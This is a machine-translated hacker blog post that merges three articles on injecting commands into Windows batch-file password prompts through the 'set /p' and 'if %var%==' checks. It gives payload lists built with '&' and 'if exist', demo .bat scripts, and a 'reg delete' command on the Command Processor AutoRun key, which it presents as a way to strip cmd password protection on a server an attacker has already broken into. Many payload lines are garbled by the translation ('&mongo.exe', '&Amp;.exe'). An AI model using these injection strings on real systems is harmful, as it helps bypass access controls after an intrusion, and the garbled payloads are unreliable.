Dos Overflow-code program Overflow

Today, I pulled out "Popular Science". Four or five years ago, cainiao did not laugh ......
 
Of course, at that time, it was still very delicious. Now we don't need to use such an "overflow" technique. As long as we know some batch processing commands, it's easy to bypass it ......
 
Also, I used to name HackerRose, HackRose, hacker ......
 
It was originally published in three independent articles and is now merged into one article, saving time and starting the text ......
 
-------------------------- Overflow in Dos -- code program overflow ----------------------------
 
Section 1 (origin ):
 
When I got online a few days ago, I accidentally saw a method for adding a password to CMD. So I tried it well, So I suddenly got an idea: Can I crack it? As a result, we have the following things.
 
I searched the internet and found that there were no methods to crack it directly in CMD. They all bypassed or cracked (input symbols such as "<"> "" | ", causing batch processing errors, closed), but it does not seem to work. There is no technical content.
 
After checking the password verification process, we found that no matter what batch processing, there are two codes: "set/p pass = enter the password :", "if % pass % = hackerrose goto OK" does not need to be explained.
 
Now we can see this verification command "if % pass % = hackerrose goto OK" and find that no matter what character is entered above, it will be loaded into this command for execution, can we skip this process by building special code? Or load a special command?
 
Section 2 (Principles ):
 
Start to build special code and look at this command: "if % pass % = hackerrose goto OK" (if pass = 'hackerrose ', jump to OK, when the password is correct, it will jump to OK to continue execution.
 
So, our purpose is to let the program jump to OK and start to build the overflow code ....
 
First, let's take a look at the available "if % pass % = hackerrose goto OK". Only pass can be replaced with any character, so we will only make a fuss here.
 
First, remove the pass and change it to "if % = hackerrose goto OK". First, complete the program judgment process. Otherwise, this command cannot be run, so that the pass = '; pass % = hackerrose goto OK, the command becomes "if % pass % = hackerrose goto OK ", in this case, the variable "% = hackerrose goto OK" is invalid because the last % is missing and is incomplete.
 
Let's look at what else we can add...
 
After the IF command is executed, the password is incorrect and the redirection fails.
 
Let's take a look at what we can add to achieve the jump. We all know that in batch processing, "&" and "&" can execute two commands one by one.
 
What are you waiting for? Add "& goto OK" to the back and try again. if pass = 'pass % = hackerrose goto OK & goto OK ', the command becomes: if % pass % = hackerrose goto OK & goto OK = hackerrose goto OK. enter it and try again.
 
Overflow successful! The program successfully jumped to the OK Mark! Simple Overflow Code is built!
 
Section 3 (in depth)
 
Now, we have successfully completed the password verification process, but this is not enough. We need to study it in depth.
 
Check the overflow code pass = "pass % = hackerrose goto OK & goto OK" and find that the preceding % pass % variable is useless, because the program will compare the overflow code we entered with the password, which is naturally not equal, then directly remove the variable. Note that the variable cannot be completely removed, otherwise, the if judgment Statement on the front side may fail to complete the command, but we can remove the variable name, leaving only %, the Code becomes pass = "% = hackerrose goto OK & goto OK". Try again... overflow successful !!
 
Continue to explore. Since no variable name is available, what is the comparison with the password? 'Hackerrose 'is also removed, and the code becomes: pass = "% = goto OK & goto OK". Try it... overflow is successful !!!
 
Further dive into the code. The previous 'Goto OK 'in the Code has no practical effect, but it is only to complete the if judgment command. We can modify the jump mark as needed, but note that it cannot be left blank! If judgment command cannot be completed, and an error occurs.
 
Change to any character, as long as no batch processing error occurs, replace it '! 'Look.
 
The Code becomes pass = "% = goto! & Goto OK ", try it... the overflow is successful!
 
Section 4 (Principles)
 
After so long, I believe everyone can understand it. In fact, we are using program filtering to build special code, and the program loads and executes external code, cause program overflow (similar to SQL Injection ^. ^ ).
 
In fact, '&' is not necessarily followed by 'Goto OK '. You can also use the DOS command you want to execute, but only one command is allowed.
 
Section 5 (exploitation)
 
The exploitation of this overflow is actually very simple, it is to crack the encrypted cmd password. One day, the attacker intruded into a server and found that the cmd was encrypted during the Elevation of Privilege, so it was no longer so depressing.
 
It's easy to use Overflow Code! Encryption can also be canceled, and various batch-processing passwords can be easily cracked.
 
The article is not well written. Sorry, Don't scold me. If you have any shortcomings, I hope you can correct them... ^. ^
 
My QQ number: ********* or 624118310
 
Blog: Http: // blog.hackerrose.cn
 
QQ technology exchange group: 1940313
 
Welcome to technical exchange!
 
Original code:
 
Pass % = hackerrose goto OK & goto OK
 
First:
 
% = Hackerrose goto rose &cmd.exe
% = Hackerrose goto rose & goto 2
 
Second:
 
% = Goto hackerrose &mongo.exe
% = Goto hackerrose & goto 2
 
Third:
 
% = Goto! &Amp;.exe
% = Goto ~ &Amp;.exe
% = Goto .&mongo.exe
% = Goto @&mongo.exe
% = Goto example & cmd.exe
% = Goto example & cmd.exe
% = Goto example & cmd.exe
% = Goto * &cmd.exe
% = Goto -&#.exe
% = Goto example & cmd.exe
% = Goto _&cmd.exe
% = Goto '&cmd.exe
% = Goto? &Amp;.exe
% = Goto/&mongo.exe
% = Goto \ &mongo.exe
 
Ultimate usage:
 
Clear password: % = goto!
 
---------------------------- Overflow under Dos-code program overflow: Echo article summary ----------------------------
 
Section 1: (origin ):
 
We all know that echo is an output command in dos (For details, refer to http://www.baidu.com/s? Wd = echo + % C3 % FC % C1 % EE % CF % EA % BD % E2 ), after publishing the article "Dos Overflow-code program overflow" Yesterday, I suddenly remembered a problem and pulled it out and checked it out.
 
Surprised to find that the original overflow is no longer the if Command (if % a % = hackerrose goto OK), but the echo output character (echo your input character is: % a % )!
 
Section 2: (Principles)
 
It turns out that when we construct special code, the if judgment command becomes "if % = hackerrose goto OK & goto OK = hackerrose goto OK" and an error occurs, the following cls command erased the error displayed on the screen, so I did not find it.
 
The Echo command that will be executed in the next step also calls the % a % variable and changes to "echo the character you entered: % = hackerrose goto OK & goto OK ", after the command is executed, two commands are dramatically changed (because & connects the two commands), which are: "echo: % = hackerrose goto OK "and" goto OK "are output first. The character you entered is % = hackerrose goto OK ", next, a "goto OK" was added, so I jumped to the OK tag and the result overflows successfully!
 
This Echo command is an echo command that I wrote to overflow the If judgment command. It is used as an aid for debugging Overflow Code, but the result reaches the Echo. depressing... ~. ~
 
It is indeed a very depressing result .....
 
Section 3: (exploration)
 
After looking at the entire overflow process, we found that, no matter what the % a % variable is equal to, we only need to add "% = goto *" before the command (to complete the previous If judgment process, otherwise, an error will occur in the if command), add "&" to the back, and add a DOS command to overflow in the echo, because the system will think that there are two commands before and after "&", the results will be executed separately, resulting in program overflow and arbitrary system commands.
 
Now we just try to build a code, such as "% = goto * & start http://blog.hackerrose.cn" successfully opened my Blog, it seems that it is still a second-level code overflow! Originally, I wanted to only overflow the if command. As a result, an echo overflow or a second-level overflow occurred!
 
Depressing ......~.~
 
Section 5: (exploitation)
 
This overflow is actually useless .....
 
Let's take it for fun ......
 
As a matter of fact, you will find that there are still many commands that can overflow!
 
!!! You can download the demo tool and source code from my Blog !!!
 
The article is not well written. Sorry, Don't scold me. If you have any shortcomings, I hope you can correct them... ^. ^
 
My QQ number: ********* or 624118310
 
Blog: Http: // blog.hackerrose.cn
 
QQ technology exchange group: 1940313
 
Welcome to technical exchange!
 
Echo Overflow Code:
 
Original code:
% = Hackerrose goto OK & (any cmd command with no parentheses)
% = Hackerrose goto OK & goto OK
 
First:
% = Hackerrose goto rose & (any cmd command with no parentheses)
% = Hackerrose goto rose &cmd.exe
% = Hackerrose goto rose & goto 2
 
Second:
% = Goto hackerrose & (any cmd command with no parentheses)
% = Goto hackerrose &mongo.exe
% = Goto hackerrose & goto 2
 
Third:
% = Goto! & (Any cmd command with no parentheses)
% = Goto! &Amp;.exe
% = Goto ~ &Amp;.exe
% = Goto .&mongo.exe
% = Goto @&mongo.exe
% = Goto example & cmd.exe
% = Goto example & cmd.exe
% = Goto example & cmd.exe
% = Goto * &cmd.exe
% = Goto -&#.exe
% = Goto example & cmd.exe
% = Goto _&cmd.exe
% = Goto '&cmd.exe
% = Goto? &Amp;.exe
% = Goto/&mongo.exe
% = Goto \ &mongo.exe
 
 
Echo overflow demo program. bat:
 
Echo off
Mode con cols = 40 lines = 5
Color
Cls
Title code program overflow demonstration Hacker 'Rose
: 1
Cls
Set a = NULL
Cls
Set/p a = input character:
If % a % = hackerrose goto OK
Cls
Echo: % a %
Echo! Overflow failed!
Echo By: Hacker 'Rose
Pause
Goto 1
: OK
Cls
Color 4
Echo prompt:
Echo! Congratulations! Overflow successful!
Echo By: Hacker 'Rose
Pause
Color
Goto 1
 
 
 
---------------------------- Overflow under Dos-code program overflow: If article else ----------------------------
 
Section 1 (origin ):
 
The article "Dos Overflow-code program overflow" written yesterday has a problem, for specific questions, refer to another article "Dos Overflow-code program overflow: Echo ". however, echo overflow has almost no practical value. In this article, we will continue to study the issue of if overflow.
 
After checking the password verification process, we found that no matter what batch processing, there are two codes: "set/p pass = enter the password :", "if % pass % = hackerrose goto OK", you do not need to explain these two commands. now let's take a look at this verification command "if % pass % = hackerrose goto OK". Whatever the value of the variable % a % is, it will be loaded into this command for execution, can we skip this process by building special code? Or load a special command?
 
Section 2: (exploration)
 
Take a look at this If judgment command "if % pass % = hackerrose goto OK" (If the variable a is equivalent to hackerrose, jump to the tag OK), where % pass % is the place where we can modify it, let's see what we can do. first, remove % pass %, and the command becomes "if = hackerrose goto OK". However, if and the following command cannot be removed from the front end, then we can find a way to build the code to jump over.
 
Let's first think about what else can the if Command do in addition to the variable judgment function? Smart people may have long thought about it. if can also be used to determine whether a file exists, for example, "if exist c: \ hacker. rose goto a "(if c: \ hacker. rose then jump to mark a) "if exist c: \ hacker. rose a.exe "(if c: \ hacker.roseexecutes a.exe), let's make the variable equal to" exist c: \ hacker. rose goto OK "Try again, overflow failed! The reason is that the "c: \ hacker. rose" file does not exist.
 
Try changing to an absolute file path, a = "exist c: \ windows \ system32 \ cmd.exe goto OK". The overflow is successful!
 
Section 3: (Principles)
 
Now that you know the method, you can start to build special code by replacing a = "exist c: \ windows \ system32 \ cmd.exe goto OK, the command is changed to "if a =" exist c: \ windows \ system32 \ cmd.exe goto OK "= hackerrose goto OK". We can see that the judgment process is changed to the file judgment process, because the command is executed from left to right, when the command is executed to "cmd.exe goto OK" again, it jumps to the OK Mark, and the command after the command is skipped because the execution pointer has already exceeded, so I was "abandoned... it achieves our overflow goal.
 
In fact, "exist c: \ windows \ system32 \ cmd.exe goto OK" may not be followed by "goto OK" with any system commands, such as when a = "exist c: \ windows \ system32 \ cmd.exe start http://blog.hackerrose.cn "(note that there is a space behind), on behalf of try, how? My Blog is successfully popped up!
 
Section 4: (in-depth)
 
The first Overflow Code test was successful, but it seems too long. Let's take a look at the Overflow Code: "exist c: \ windows \ system32 \ cmd.exe goto OK". Can we shorten it a bit? Replace "c: \ windows \ system32 \ cmd.exe" with "*" (set the file to any file, note: '*' indicates any file ), try changing the code to "exist * goto OK.
 
Overflow successful! How is it? Is it short enough?
 
Check whether there are other methods. Replace "goto OK" in the overflow code with "*", and the overflow code into "exist **". Try again. Overflow failed! The reason is: "No Subsequent commands are executed". How can we add another command to the back end?
 
Do not forget to introduce a good thing in the previous article. In dos, "&" or "&" can talk about two commands and execute one command, then let's add "& goto OK" to the back and convert the code to "exist ** & goto OK". Try again ..
 
How is it? Is the overflow successful? In fact, "&" you can follow any doscommand, such as: "exist ** & start http://blog.hackerrose.cn", try... my blog went straight out again ..... ^. ^
 
Section 5: (exploitation)
 
The exploitation of this overflow is actually very simple, it is to crack the encrypted cmd password. One day, the attacker intruded into a server and found that the cmd was encrypted during the Elevation of Privilege, so it was no longer so depressing.
 
It's easy to use Overflow Code! Encryption can also be canceled. passwords for various batch processing can also be easily cracked...
 
As for some time ago, the popular cmd encryption methods for major hacker websites seem to be useless, saying: "Even if it overflows, it cannot obtain system permissions... ", it's nonsense. Just write an" exist ** & reg delete "HKEY_LOCAL_MACHINE \ SOFTWARE \ microsoft \ CoMMand processor \"/v AutoRun/f "before executing the CoMMand ", you have no password, but you are still forced to install it!
 
In fact, there is still a lot to use, and we develop and use it ourselves.
 
If you study more, you will find that there are still many commands that can overflow!
 
!!! You can download the demo tool and source code from my Blog !!!
 
The article is not well written. Sorry, Don't scold me. If you have any shortcomings, I hope you can correct them... ^. ^
 
My QQ number: ********* or 624118310
 
Blog: Http: // blog.hackerrose.cn
 
QQ technology exchange group: 1940313
 
Welcome to technical exchange!
 
If Overflow Code:
 
First:
Exist c: \ windows \ system32 \ cmd.exe (any cmd command with no parentheses)
Exist c: \ windows \ system32 \ cmd.exe goto OK
Exist c: \ windows \ system32 \ cmd.exe
Exist * goto OK
Second:
Exist ** & (any cmd command with no parentheses)
Exist ** & goto OK
Exist. * & goto OK
Exist? * & Goto OK
Exist/* & goto OK
Exist \ * & goto OK
 
Ultimate method:
Clear password: exist ** & reg delete "HKEY_LOCAL_MACHINE \ SOFTWARE \ microsoft \ CoMMand processor \"/v AutoRun/f
 
 
 
If overflow demo program. bat:
 
Echo off
Mode con cols = 40 lines = 5
Color
Cls
Title code program overflow demonstration Hacker 'Rose
: 1
Cls
Set a = NULL
Cls
Set/p a = input character:
If % a % = hackerrose goto OK
Cls
Echo prompt:
Echo! Overflow failed!
Echo By: Hacker 'Rose
Pause
Goto 1
: OK
Cls
Color 4
Echo prompt:
Echo! Congratulations! Overflow successful!
Echo By: Hacker 'Rose
Pause
Color
Goto 1
 
References:
 
Role of special symbols in Windows batch processing-Role of special symbols in batch processing and CMD: http://lcx.cc /? FoxNews=1997.html